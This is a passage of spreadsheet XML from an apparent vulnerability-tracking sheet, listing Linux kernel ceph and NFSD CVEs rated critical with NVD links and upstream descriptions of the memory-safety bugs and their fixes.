      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89651</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr"/>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: bound MDSCapAuth path and fs_name decode in handle_session()
handle_session() decodes the MDSCapAuth records carried by a
CEPH_SESSION_OPEN message (msg_version &gt;= 6). For each record the
match.path and match.fs_name byte strings are read by first decoding a
32-bit length and then copying that many bytes with the bare
ceph_decode_copy(). Unlike the surrounding fields, which all use the
_safe decode variants, these two copies are not preceded by a
ceph_decode_need() bounds check, and the enclosing MDSCapAuth and
MDSCapMatch struct_len fields are skipped rather than enforced as an
upper bound. A length larger than the bytes remaining in the message
front makes ceph_decode_copy() read past the end of the front buffer.
The message front is a dedicated allocation (ceph_msg_new2() -&gt;
kvmalloc), so the over-read runs off that object. A malicious or
compromised MDS can trigger this with the first post-connect message on
mount, with no client-side user interaction; under KASAN it is reported
as a slab-out-of-bounds read in handle_session().
Impact: a malicious MDS can force the kernel client to read up to 4 GiB
past the message front allocation during session setup, crashing the
client (out-of-bounds read).
Switch both copies to ceph_decode_copy_safe(), which performs the
ceph_decode_need() bounds check before the copy and branches to the
existing bad label, matching the rest of the decoder and the error path
that frees the partially decoded cap_auths array.</t>
        </is>
      </c>
      <c r="S74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89651</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89652</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr"/>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: bound copied dentry name length in NFS export get_name
ceph_get_name() copies the MDS-supplied name into the caller's
NAME_MAX-sized buffer with memcpy(name, rinfo-&gt;dname, rinfo-&gt;dname_len)
and then writes name[rinfo-&gt;dname_len] = 0, without checking dname_len
against NAME_MAX. A malicious or buggy MDS that returns a LOOKUPNAME reply
with dname_len &gt; NAME_MAX overflows the buffer. __get_snap_name() copies
rde-&gt;name / rde-&gt;name_len the same unchecked way.
Impact: a malicious or compromised Ceph MDS overflows the NAME_MAX name
buffer in a client's NFS-export get_name path, a slab out-of-bounds write
reported by KASAN. Reachable when a CephFS mount is re-exported over NFS.
Add ceph_export_copy_name(), which rejects lengths above NAME_MAX with
-ENAMETOOLONG before the copy, and use it in both ceph_get_name() and
__get_snap_name().</t>
        </is>
      </c>
      <c r="S75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89652</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89653</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr"/>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: reject export_targets ranks &gt;= CEPH_MAX_MDS in mdsmap decode
MDSMap export_targets entries are monitor controlled. check_new_map()
uses each entry as a bit number in a fixed stack bitmap, so a rank
outside the protocol namespace can make set_bit() write past the end of
the array.
Reject ranks outside CEPH_MAX_MDS while decoding the map. Do not
validate against possible_max_rank here because maps may legitimately
reference ranks beyond a temporarily reduced max_mds.</t>
        </is>
      </c>
      <c r="S76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89653</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89654</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr"/>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: fix UAF in check_new_map() on session freed during unlock
check_new_map() iterates mdsc-&gt;sessions[] and for each active session
drops mdsc-&gt;mutex to perform per-session operations.  The forced-close
path (rank removed from map) correctly takes a reference on s via
ceph_get_mds_session() before releasing mdsc-&gt;mutex, but three other
paths do not:
  Path A (address changed):  mutex_unlock → mutex_lock(&amp;s-&gt;s_mutex)
  Path B (reconnect):        mutex_unlock → send_mds_reconnect(mdsc, s)
  Path C (active transition): mutex_unlock → mutex_lock(&amp;s-&gt;s_mutex)
Without the extra reference, another thread can acquire mdsc-&gt;mutex
during the unlock window, call __unregister_session() which drops the
last reference on s, and free it.  The original thread then accesses
freed memory via s-&gt;s_mutex.
Fix by adding ceph_get_mds_session(s) before each mutex_unlock and
ceph_put_mds_session(s) after the corresponding mutex_lock, matching
the pattern already used in the forced-close path.
Race timeline (Path A):
  Thread A (check_new_map)             Thread B (another map update
    holds mdsc-&gt;mutex                      or session teardown)
  --------------------------           --------------------------
  s = mdsc-&gt;sessions[i]
  (refcount == 1, held only by
   sessions[] array)
  mutex_unlock(&amp;mdsc-&gt;mutex)
                               ---&gt;    acquires mdsc-&gt;mutex
                                       __unregister_session(mdsc, s)
                                         sessions[i] = NULL
                                         ceph_put_mds_session(s)
                                           refcount: 1 -&gt; 0
                                           kfree(s)  &lt;--- freed!
  mutex_lock(&amp;s-&gt;s_mutex)
  UAF on freed s-&gt;s_mutex</t>
        </is>
      </c>
      <c r="S77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89654</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89655</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: fix UAF in __kick_flushing_caps() on cf entry freed during unlock
list_for_each_entry() iterates ci-&gt;i_cap_flush_list but drops
i_ceph_lock to send cap messages.  During the unlock window,
handle_cap_flush_ack() can acquire i_ceph_lock, detach cf entries
with tid &lt;= flush_tid from the list, release i_ceph_lock, and free
them via ceph_free_cap_flush() outside any lock.  When the original
thread reacquires i_ceph_lock and the for-loop macro advances via
cf = list_next_entry(cf, i_list), it dereferences cf-&gt;i_list.next
on freed memory.
The race timeline:
  __kick_flushing_caps()              handle_cap_flush_ack()
  -----------------------             -----------------------
  holds i_ceph_lock        &lt;---
  iterates to cf (tid=10)
  prepares FLUSH message
  drops i_ceph_lock        &lt;---
  __send_cap() ── FLUSH(tid=10)
	                              MDS sends FLUSH_ACK(tid=10)
                           ---&gt;       acquires i_ceph_lock
                                      cf-&gt;tid(10) &lt;= flush_tid(10),
                                      detaches cf from i_cap_flush_list
                                      drops i_ceph_lock
                                      ceph_free_cap_flush(cf) &lt;- frees it!
  acquires i_ceph_lock     &lt;---
  for-loop advances:
    cf = list_next_entry(cf, i_list)
      -- UAF on freed cf-&gt;i_list.next
The cf was just sent by __kick_flushing_caps itself via __send_cap().
The MDS may respond with FLUSH_ACK quickly enough that
handle_cap_flush_ack() frees cf before __kick_flushing_caps can
finish the iteration.
Fix by converting to a manual while loop: save the next pointer
under i_ceph_lock before dropping it, then use the saved pointer
after reacquiring, so the potentially-freed cf is never accessed again.</t>
        </is>
      </c>
      <c r="S78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89655</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89656</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr"/>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
libceph: reject buckets with mismatched CRUSH ids
crush_decode() stores bucket data by array slot, and the mapper later
derives the per-bucket workspace index from the decoded bucket id. A
malformed map can therefore make one bucket reuse another bucket's
workspace by encoding an id different from -1 - slot.
For uniform buckets, the second replica selection expands the source
bucket's permutation into that aliased workspace buffer. If the source
bucket is larger than the aliased bucket, the write runs past the smaller
permutation array and can escape the kvmalloc'd CRUSH workspace. KASAN
reports a slab OOB write of 4 bytes in bucket_perm_choose().
Reject buckets whose encoded id does not match their array slot. Valid
CRUSH maps already use the canonical negative id corresponding to the
bucket slot, so this restores the invariant expected by
work-&gt;work[-1 - in-&gt;id] without changing valid map behavior.</t>
        </is>
      </c>
      <c r="S79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89656</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89658</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr"/>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent client use-after-free during NFSv4.0 revoked-state cleanup
nfs40_clean_admin_revoked() takes a stateid reference under
clp-&gt;cl_lock, drops nn-&gt;client_lock, and calls
nfsd4_drop_revoked_stid(), which dereferences the stateid's client
through s-&gt;sc_client-&gt;cl_lock.  The stateid reference does not pin the
client, so a teardown racing the dropped lock can free the client
while nfsd4_drop_revoked_stid() is still using it.
This cleanup runs from the laundromat, so a periodic sweep can race
force_expire_client() driven by a write to the clients/&lt;id&gt;/ctl file.
Skip a client that is already expiring and otherwise pin it with
cl_rpc_users under client_lock before dropping the lock, matching
nfsd4_revoke_states().</t>
        </is>
      </c>
      <c r="S80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89658</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89659</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr"/>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent client use-after-free during delegation revoke
A delegation stateid holds only a bare pointer to its owning
nfs4_client and does not keep it alive.  The client survives its
stateids only because __destroy_client() drains cl_delegations and
cl_revoked before free_client() runs.
nfs4_laundromat() breaks that invariant: it unhashes an
expired delegation from cl_delegations, drops deleg_lock, then
revoke_delegation() relinks it onto cl_revoked under cl_lock.  In that
window the delegation is on neither list, so client_has_state() can
report no remaining state.
Every teardown path first requires cl_rpc_users to be zero, but
the laundromat holds no such reference.  A client whose recalled
delegation has just timed out can therefore reach free_client()
while revoke_delegation() is still about to dereference cl_lock,
a use-after-free.
Pin the client with cl_rpc_users across the revoke so teardown blocks
until it completes, then reap the delegation from cl_revoked.  A client
already expiring reaps its own, so skip it and leave the delegation on
del_recall_lru.</t>
        </is>
      </c>
      <c r="S81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89659</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89660</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr"/>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent client use-after-free during admin state revocation
A stateid holds only a bare pointer to its nfs4_client; a stateid
reference does not pin it.  The client survives only because
__destroy_client() drains its stateids before free_client() runs.
nfsd4_revoke_states() drops nn-&gt;client_lock across revoke_one_stid(),
which dereferences the client to revoke a stateid and read
clp-&gt;cl_minorversion.  A teardown racing the dropped lock can free
the client first.
Pinning cl_rpc_users under client_lock blocks the DESTROY_CLIENTID and
EXCHANGE_ID teardown, which refuses while cl_rpc_users is non-zero.
force_expire_client() ignores it: once its wait for cl_rpc_users to
reach zero has passed, a later pin goes unnoticed.
Under client_lock, skip a client whose cl_time is already zero --
force_expire_client() clears it there before waiting -- otherwise pin
cl_rpc_users before dropping the lock.  The walk then either sees the
expiry and skips, or pins in time for that wait to cover the revoke.</t>
        </is>
      </c>
      <c r="S82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89660</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89662</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr"/>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent lock owner use-after-free during client teardown
__destroy_client() releases a client's open owners, but a lock owner
whose only reference is a blocked lock (nbl) stays on
cl_ownerstr_hashtbl.  client_has_state() does not count a bare owner,
so DESTROY_CLIENTID can reach __destroy_client() with such owners
present.
__destroy_client() then walks the table, calling remove_blocked_locks()
on each owner without a reference.  Freeing a blocked lock drops the
owner reference held via flc_owner.  The per-net laundromat reaps
blocked locks from nn-&gt;blocked_locks_lru independently of client state.
The two paths share blocked_locks_lock only for the list splice, not
the owner's lifetime.  The laundromat therefore frees the owner as
__destroy_client() dereferences it, a NULL dereference in
remove_blocked_locks().
nfsd4_release_lockowner() holds a reference across the same call;
__destroy_client() does not.  Hold cl_lock across the walk, taking a
reference and unhashing each owner, then drop it before
remove_blocked_locks() and nfs4_put_stateowner(), which take
blocked_locks_lock and cl_lock.</t>
        </is>
      </c>
      <c r="S83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89662</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89669</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr"/>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: initialize copy-notify stateid before publishing it
nfsd4_copy_notify() finished initializing the cpntf state after
nfs4_alloc_init_cpntf_state() had already linked it into the
s2s_cp_stateids IDR and the parent's sc_cp_list, with cs_count == 1 (the
membership reference) and none held for the caller. A racing
OFFLOAD_CANCEL (crafted cl_id == nn-&gt;s2s_cp_cl_id plus the guessable
so_id) could reach manage_cpntf_state() and free the entry, turning the
caller's subsequent cpn_cnr_stateid read and cp_p_stateid/cp_p_clid
writes into use-after-free. The owning clientid was also only recorded
after publication, so it could not gate an ownership check in that window.
Record cp_p_stateid and cp_p_clid inside nfs4_alloc_init_cpntf_state()
before nfs4_init_cp_state() publishes the entry, and return it with an
extra reference. The caller reads the stateid under that reference and
drops it with nfs4_put_cpntf_state(); on a late error the laundromat
reaps the entry.</t>
        </is>
      </c>
      <c r="S84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89669</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89674</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr"/>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix XDR length calculation in nfsd4_ff_encode_layoutget
The XDR buffer size calculation in nfsd4_ff_encode_layoutget() has
multiple errors that can result in either an out-of-bounds write or
leaking uninitialized kernel memory to the client:
 - fh_len doesn't account for XDR padding on the file handle data
 - uid and gid lengths use "8 + len" but xdr_encode_opaque() actually
   writes "4 + xdr_align_size(len)" bytes
 - ds_len omits the flags and stats_collect_hint fields (8 bytes),
   while len's header constant overestimates by 8 bytes -- these
   partially cancel but leave a net mismatch
The worst case occurs with short strings (e.g. uid=0, gid=0 with an
odd-sized file handle), where the function writes up to 5 bytes past
the reserved XDR buffer. Conversely, when string lengths happen to be
4-byte aligned, the reservation is too large and stale buffer content
is sent to the client.
Fix this by breaking out every encoded field explicitly in the ds_len
calculation, using xdr_align_size() for all variable-length opaque
fields, and correcting the header constants.</t>
        </is>
      </c>
      <c r="S85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89674</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89675</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
